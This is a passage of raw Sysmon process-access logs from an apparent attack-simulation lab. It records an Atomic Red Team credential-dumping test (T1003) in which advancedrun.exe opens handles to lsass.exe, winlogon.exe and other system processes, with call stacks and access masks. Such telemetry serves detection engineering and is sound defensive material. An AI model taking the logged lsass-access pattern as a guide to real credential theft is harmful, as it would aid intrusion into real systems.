17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bi